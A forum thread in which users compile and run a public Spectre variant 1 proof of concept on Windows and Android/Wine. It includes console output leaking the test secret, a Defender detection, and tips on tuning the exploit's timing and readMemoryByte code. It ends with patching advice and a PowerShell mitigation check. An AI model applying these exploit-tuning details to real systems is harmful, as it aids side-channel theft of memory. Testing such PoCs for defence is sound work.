Used the suggested TDM-GCC to compile the sources. First gives:

Code:
C:\TDM-GCC-32>spectre1
Reading 40 bytes:
Reading at malicious_x = 00001004... Success: 0x54='T' score=2
Reading at malicious_x = 00001005... Success: 0x68='h' score=2
Reading at malicious_x = 00001006... Success: 0x65='e' score=2
Reading at malicious_x = 00001007... Success: 0x20=' ' score=2
Reading at malicious_x = 00001008... Success: 0x4D='M' score=2
Reading at malicious_x = 00001009... Success: 0x61='a' score=2
Reading at malicious_x = 0000100A... Success: 0x67='g' score=2
Reading at malicious_x = 0000100B... Success: 0x69='i' score=2
Reading at malicious_x = 0000100C... Success: 0x63='c' score=2
Reading at malicious_x = 0000100D... Success: 0x20=' ' score=2
Reading at malicious_x = 0000100E... Success: 0x57='W' score=2
Reading at malicious_x = 0000100F... Success: 0x6F='o' score=2
Reading at malicious_x = 00001010... Success: 0x72='r' score=2
Reading at malicious_x = 00001011... Success: 0x64='d' score=2
Reading at malicious_x = 00001012... Success: 0x73='s' score=2
Reading at malicious_x = 00001013... Success: 0x20=' ' score=2
Reading at malicious_x = 00001014... Success: 0x61='a' score=2
Reading at malicious_x = 00001015... Success: 0x72='r' score=2
Reading at malicious_x = 00001016... Success: 0x65='e' score=2
Reading at malicious_x = 00001017... Success: 0x20=' ' score=2
Reading at malicious_x = 00001018... Success: 0x53='S' score=2
Reading at malicious_x = 00001019... Success: 0x71='q' score=7
Reading at malicious_x = 0000101A... Success: 0x75='u' score=2
Reading at malicious_x = 0000101B... Success: 0x65='e' score=2
Reading at malicious_x = 0000101C... Success: 0x61='a' score=2
Reading at malicious_x = 0000101D... Success: 0x6D='m' score=2
Reading at malicious_x = 0000101E... Success: 0x69='i' score=7
Reading at malicious_x = 0000101F... Success: 0x73='s' score=7
Reading at malicious_x = 00001020... Success: 0x68='h' score=2
Reading at malicious_x = 00001021... Success: 0x20=' ' score=2
Reading at malicious_x = 00001022... Success: 0x4F='O' score=7
Reading at malicious_x = 00001023... Success: 0x73='s' score=2
Reading at malicious_x = 00001024... Success: 0x73='s' score=2
Reading at malicious_x = 00001025... Success: 0x69='i' score=2
Reading at malicious_x = 00001026... Success: 0x66='f' score=2
Reading at malicious_x = 00001027... Success: 0x72='r' score=2
Reading at malicious_x = 00001028... Success: 0x61='a' score=7 (second best: 0x03 score=1)
Reading at malicious_x = 00001029... Success: 0x67='g' score=2
Reading at malicious_x = 0000102A... Success: 0x65='e' score=2
Reading at malicious_x = 0000102B... Success: 0x2E='.' score=2
Original: The Magic Words are Squeamish Ossifrage.
Recovered: The Magic Words are Squeamish Ossifrage.

Second source gives:

Code:
C:\TDM-GCC-32>spectre
Reading 40 bytes:
Reading at malicious_x = 00001004... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 00001005... Unclear: 0xFF='?' score=999 (second best: 0xFB score=999)
Reading at malicious_x = 00001006... Unclear: 0xFD='?' score=999 (second best: 0xFB score=999)
Reading at malicious_x = 00001007... Unclear: 0xFD='?' score=999 (second best: 0xFC score=999)
Reading at malicious_x = 00001008... Unclear: 0xFC='?' score=999 (second best: 0xFA score=999)
Reading at malicious_x = 00001009... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0000100A... Unclear: 0xFF='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0000100B... Unclear: 0xFF='?' score=999 (second best: 0xFB score=999)
Reading at malicious_x = 0000100C... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0000100D... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0000100E... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0000100F... Unclear: 0xFF='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 00001010... Unclear: 0xFC='?' score=999 (second best: 0xFB score=999)
Reading at malicious_x = 00001011... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 00001012... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 00001013... Unclear: 0xFF='?' score=999 (second best: 0xFC score=999)
Reading at malicious_x = 00001014... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 00001015... Unclear: 0xFF='?' score=999 (second best: 0xFC score=999)
Reading at malicious_x = 00001016... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 00001017... Unclear: 0xFF='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 00001018... Unclear: 0xFF='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 00001019... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0000101A... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0000101B... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0000101C... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0000101D... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0000101E... Unclear: 0xFD='?' score=999 (second best: 0xF8 score=999)
Reading at malicious_x = 0000101F... Unclear: 0xFD='?' score=999 (second best: 0xFB score=999)
Reading at malicious_x = 00001020... Unclear: 0xF9='?' score=999 (second best: 0xF3 score=999)
Reading at malicious_x = 00001021... Unclear: 0xFC='?' score=999 (second best: 0xFB score=999)
Reading at malicious_x = 00001022... Unclear: 0xFE='?' score=999 (second best: 0xF9 score=999)
Reading at malicious_x = 00001023... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 00001024... Unclear: 0xFD='?' score=999 (second best: 0xFC score=999)
Reading at malicious_x = 00001025... Unclear: 0xFF='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 00001026... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 00001027... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999)
Reading at malicious_x = 00001028... Unclear: 0xFD='?' score=999 (second best: 0xFB score=999)
Reading at malicious_x = 00001029... Unclear: 0xFC='?' score=999 (second best: 0xF7 score=999)
Reading at malicious_x = 0000102A... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0000102B... Unclear: 0xFF='?' score=999 (second best: 0xFC score=999)
Original: The Magic Words are Squeamish Ossifrage.
Recovered: ????????????????????????????????????????

Additionally, Defender just tried to arrest the spectre EXE files.

Code:
NAME_____:Exploit:Win32/Spectre.A
RESOURCE_:file:_C:\TDM-GCC-32\spectre.exe
EXECUTED_:False
ISACTIVE_:False
You can start the spectre EXE from the Wine emulator on any system. I run it from my Android phone. What do you think the magic word is on the phone?
Wow, I forgot to look at this, dude, but now I see it, and this is awesome. Many thanks for sharing it here. I'm still thinking of making one too; who knows, someday, if it's not very expensive.
No bro, of course not. Sometimes it's better to smile than to cry when we see this huge and bad behavior that started with Intel.
@s1ave77 That's the expected result. The "faster" version is for older hardware e.g. using LGA 775/771 socket. You can change it to work on modern hardware by changing __rdtsc() into __rdtscp(& junk). I've made another change to the code since I was able to compile it and get a good result on Windows with TDM-GCC, but Linux was giving me a bad result. Now both are giving me a good result. The issue is with the readMemoryByte function. Notice that it contains a line saying "use junk so code above won’t get optimized out". Basically if you modify any code in that function then it could be the difference between Spectre working or not working. I could literally write the code 3-4 different ways and only 1 would function well. @Mikorist Try the newer version containing assembly. It'll probably be better.
Yes. Our comments aren't so much different though. The second level of Spectre does not have a software fix, if I recall properly. Despite all the published patches, there is still one thing remaining: these problems had been in existence for over a decade without anyone reporting them.
Other than compiler weirdness, that's why I didn't get around to posting executables. We'd get the inevitable "is it safe?" questions. @Mikorist I guess you'd like my version to do the same? I'll take a look, but if the compiler starts misbehaving then I won't post anything.
@Mikorist Unfortunately it causes compiler weirdness as it changes the readMemoryByte function. The hit threshold isn't that important anyway and we can already change the address and length. Speaking of which, I've made a minor edit so that the secret isn't printed when an address and length are given.
On Linux it doesn't seem to matter, but on other platforms it can generate a warning. The original code will crash on old hardware. My version doesn't and it'll compile on Windows, Linux & Mac OS.
I've deleted some posts from this thread as I think a few people are getting confused.
- Windows, Mac OS and Linux (e.g. openSUSE) are fully patched
- You require a microcode update to protect yourself from Spectre variant 2
- Getting a result from the Spectre PoC shouldn't worry you. Focus on what the PowerShell script says!
- Updating applications that may contain sensitive information helps, e.g. Firefox, Chrome & Nvidia
So if you're fully patched you can relax. You'll only be impacted if you don't apply application updates and launch an infected executable.
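As an added example, not code posted by anyone in this thread, here is a PowerShell check of the kind the post above points to. It assumes the "PowerShell script" referred to is Microsoft's SpeculationControl module and its Get-SpeculationControlSettings cmdlet; the property names used below are assumed to match that module's output and may differ between module versions. The module must be installed first, which the block does.

```powershell
# Added example: summarise Windows mitigation state for Spectre variant 2 and Meltdown.
# Assumes Microsoft's SpeculationControl module from the PowerShell Gallery
# (Install-Module SpeculationControl) and its Get-SpeculationControlSettings cmdlet.
# Property names are assumed from that module's output and may vary by version.
Install-Module -Name SpeculationControl -Scope CurrentUser -Force
Import-Module SpeculationControl

# -Quiet suppresses the module's own console report; we read the returned object instead.
$s = Get-SpeculationControlSettings -Quiet

# Spectre variant 2 (branch target injection) needs BOTH the microcode update
# (hardware support present) AND the OS-side mitigation present and enabled.
# A PoC that still reads its own address space says nothing about either.
$btiOk = $s.BTIHardwarePresent -and
         $s.BTIWindowsSupportPresent -and
         $s.BTIWindowsSupportEnabled

# Meltdown (rogue data cache load) is mitigated by kernel VA shadowing, which is only
# needed on CPUs the module flags as requiring it.
$kvaOk = (-not $s.KVAShadowRequired) -or
         ($s.KVAShadowWindowsSupportPresent -and $s.KVAShadowWindowsSupportEnabled)

[pscustomobject]@{
    Variant2_MicrocodePresent = $s.BTIHardwarePresent
    Variant2_OSMitigationOn   = $s.BTIWindowsSupportEnabled
    Variant2_Mitigated        = $btiOk
    Meltdown_Mitigated        = $kvaOk
}
```

If Variant2_MicrocodePresent is False while the OS fields are True, the missing piece is the firmware/microcode update from the system vendor, which is exactly the case the post above calls out.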
Of course. In the above-mentioned PDF, the scientists showed a PoC for testing purposes that reads the result from its own address space. They did not publicly release the one that attacks apps and is not harmless. And I hope they never will.